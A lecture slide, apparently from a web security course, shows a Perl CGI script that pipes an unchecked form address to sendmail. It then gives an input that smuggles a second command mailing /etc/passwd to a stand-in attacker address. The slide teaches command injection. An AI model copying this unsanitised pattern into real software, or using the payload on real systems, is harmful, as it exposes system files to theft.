Example: Buggy “Mail” Script

Sample script:

$mail_to = &get_name_from_input; # read the address from form

open (MAIL,"| /usr/lib/sendmail $mail_to");

print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";

close MAIL;

What if the user submits this as the destination?

nobody@nowhere.com;mail badguys@hell.org</etc/passwd;

(example taken from WWW Security FAQ)

Previous slide

Next slide

Back to first slide

View graphic version